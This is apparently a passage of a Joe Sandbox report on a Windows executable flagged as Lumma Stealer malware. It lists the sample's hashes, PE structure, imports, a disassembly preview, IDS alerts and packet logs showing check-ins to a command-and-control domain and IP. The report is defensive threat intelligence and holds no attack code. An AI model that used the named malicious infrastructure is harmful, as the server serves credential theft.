https://racedsuitreow.shop/api$&	BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.microsoft.co	BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/golang/protobuf/issues/1609):	iq2HxA0SLw.exe	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/api=	BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.37.97	racedsuitreow.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519274
Start date and time:	2024-09-26 09:45:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	iq2HxA0SLw.exe renamed because original name is a hash value
Original Sample Name:	da6f9e46eacbde011e7d9a6e742d05c9.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target iq2HxA0SLw.exe, PID 2992 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: iq2HxA0SLw.exe

Simulations

Behavior and APIs

Time	Type	Description
03:46:59	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.37.97	file.exe	Get hash	malicious	LummaC	Browse
	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	File.exe	Get hash	malicious	LummaC	Browse
	SetupPowerGREP.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
racedsuitreow.shop	file.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	BLHvvl44N0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.206.221
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	ptgl503.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	0x000e00000001da78-93.exe	Get hash	malicious	LummaC	Browse	172.67.206.221
	LaWl4DY2kW.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97
	File.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	SetupPowerGREP.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Payment Details.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.13.205
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	450230549.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	64.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	450230549.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	PO-100001499.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	104.21.64.108
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	https://tiktoksc.tv/wap	Get hash	malicious	Unknown	Browse	104.21.37.97
	https://xtrafree.x10.mx/	Get hash	malicious	Unknown	Browse	104.21.37.97
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.21.37.97
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.37.97
	HHXyi02DYl.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	LcDQjpdIiU.exe	Get hash	malicious	LummaC	Browse	104.21.37.97
	BLHvvl44N0.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.37.97

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.182237533258545
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	iq2HxA0SLw.exe
File size:	19'231'232 bytes
MD5:	da6f9e46eacbde011e7d9a6e742d05c9
SHA1:	a022be00f60db2721120fbbf2acdd4435e86706a
SHA256:	ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
SHA512:	7ea89b332305db5d3daa7142b9f6e2b3aaacca0c183c01b44fa1b550b64888873d281a45069747e0189b3f54fad7fce990b9032f830877542cf6ddedabd05159
SSDEEP:	98304:NTTeIGekR9MTdlL+E9Qep3gnevWXNDlUwrGdEdhG+V/69hiVwXFE0:wUHL+E9Qehgne+9prGOdA+4WR0
TLSH:	D5173947E9A544E8C1EDD538852682267B71BC498B3037D73B60F6782F72BC0AEB9354
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..e..n%..*.............@............................. /.......%...`... ............................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x1400014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x40652c20, 0x1, 0x40652bf0, 0x1, 0x40656690, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	c595f1660e1a3c84f4d9b0761d23cd7a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [011FDBD5h]
mov dword ptr [eax], 00000001h
call 00007EFDF95C8DCFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [011FDBB5h]
mov dword ptr [eax], 00000000h
call 00007EFDF95C8DAFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007EFDF9C2560Ch
dec eax
test eax, eax
sete al
movzx eax, al
neg eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007EFDF95C90E9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp dword ptr [eax]
inc edi
outsd
and byte ptr [edx+75h], ah
imul ebp, dword ptr [esp+20h], 203A4449h
and ah, byte ptr [esi+73h]
xor al, 6Dh
push 00000078h
outsb
push 00000074h
dec ecx
arpl word ptr [eax], di
dec ebx
pop edx
aaa
imul ecx, dword ptr [ebx+58h], 30h
das
pop edi
push ecx
inc edi
push edx
push 00000070h
inc ebx
xor eax, 36734C6Dh
push dx
push 00000069h
js 00007EFDF95C9173h
push edx
das
push edx
arpl word ptr [ebx+ebp*2+4Dh], sp
pop edi
inc ebx
pop edx
xor ah, byte ptr [si+69h]
jp 00007EFDF95C9183h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x12ba000	0x4e	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12bb000	0x1458	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12bf000	0xe8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1200000	0x25698	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12ce000	0x23034	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x11fea00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x12bb494	0x458	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65d1c0	0x65d200	7b69be1a04fe8796814c1880afd9032d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x65f000	0x722d0	0x72400	2c3229a14ac95278e353f7007b1f6c6d	False	0.31593613238512036	dBase III DBT, version number 0, next free block index 10, 1st item "5.5\011h1:KKUZBfBoyqy5d3swXyiC7Q76ic40rYcbqH7qjh59kzU="	4.869698553997173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x6d2000	0xb2d850	0xb2da00	381aa7ad03412c9cbb3ba8f6449c0224	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata	0x1200000	0x25698	0x25800	45605ed3913e8b9682bae002b083ee68	False	0.4016341145833333	data	5.87247973963546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata	0x1226000	0xc60	0xe00	03a34cf0b2e5f3021518c50e9ad81896	False	0.25948660714285715	data	4.004045761043318	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x1227000	0x92980	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x12ba000	0x4e	0x200	6bc3495faf92c36fbe67ad93141651e0	False	0.1328125	data	0.9168902136227094	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x12bb000	0x1458	0x1600	e50527972d6afb1999a572992c114b2e	False	0.298828125	data	4.618021107573519	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x12bd000	0x70	0x200	7439bad3ca22e9f5688b7cb117ceeae1	False	0.083984375	data	0.47677526113352753	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x12be000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x12bf000	0xe8f4	0xea00	6bde4bae1c79bfeb462354d2c4f25d75	False	0.16457999465811965	data	3.4998392732394823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x12ce000	0x23034	0x23200	bca3a40f3d5a25c7e8607da3417042df	False	0.20341692615658363	data	5.452689327163072	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x12bf384	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0x12bfdec	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0x12c0454	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0x12c073c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0x12c0864	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0x12c1e8c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0x12c2d34	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0x12c35dc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0x12c3b44	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0x12c4e2c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0x12c9054	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0x12cb5fc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0x12cc6a4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_GROUP_ICON	0x12ccb0c	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0x12ccbc8	0x584	data	English	United States	0.26770538243626063
RT_MANIFEST	0x12cd14c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL

Import

KERNEL32.dll

AddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler

msvcrt.dll

___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

Exports

Name	Ordinal	Address
_cgo_dummy_export	1	0x1412b8bb0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T09:47:00.715068+0200	2056078	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop)	1	192.168.2.9	54044	1.1.1.1	53	UDP
2024-09-26T09:47:01.202824+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.9	49708	104.21.37.97	443	TCP
2024-09-26T09:47:01.378739+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49708	104.21.37.97	443	TCP
2024-09-26T09:47:01.378739+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49708	104.21.37.97	443	TCP
2024-09-26T09:47:01.975769+0200	2056079	ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI)	1	192.168.2.9	49709	104.21.37.97	443	TCP
2024-09-26T09:47:02.487821+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49709	104.21.37.97	443	TCP
2024-09-26T09:47:02.487821+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49709	104.21.37.97	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 09:47:00.732105017 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:00.732145071 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:00.732207060 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:00.736118078 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:00.736133099 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.202739954 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.202824116 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.207156897 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.207165003 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.207600117 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.254381895 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.277460098 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.277460098 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.277604103 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.378774881 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.378848076 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.378889084 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.378911018 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.378926992 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.378976107 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.378982067 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.379034042 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.379230022 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.382287979 CEST	49708	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.382304907 CEST	443	49708	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.512253046 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.512298107 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.512372971 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.512739897 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.512757063 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.975689888 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.975769043 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.977535963 CEST	49709	443	192.168.2.9	104.21.37.97
Sep 26, 2024 09:47:01.977546930 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.977879047 CEST	443	49709	104.21.37.97	192.168.2.9
Sep 26, 2024 09:47:01.979615927 CEST	49709	443	192.168.2.9	104.21.37.97
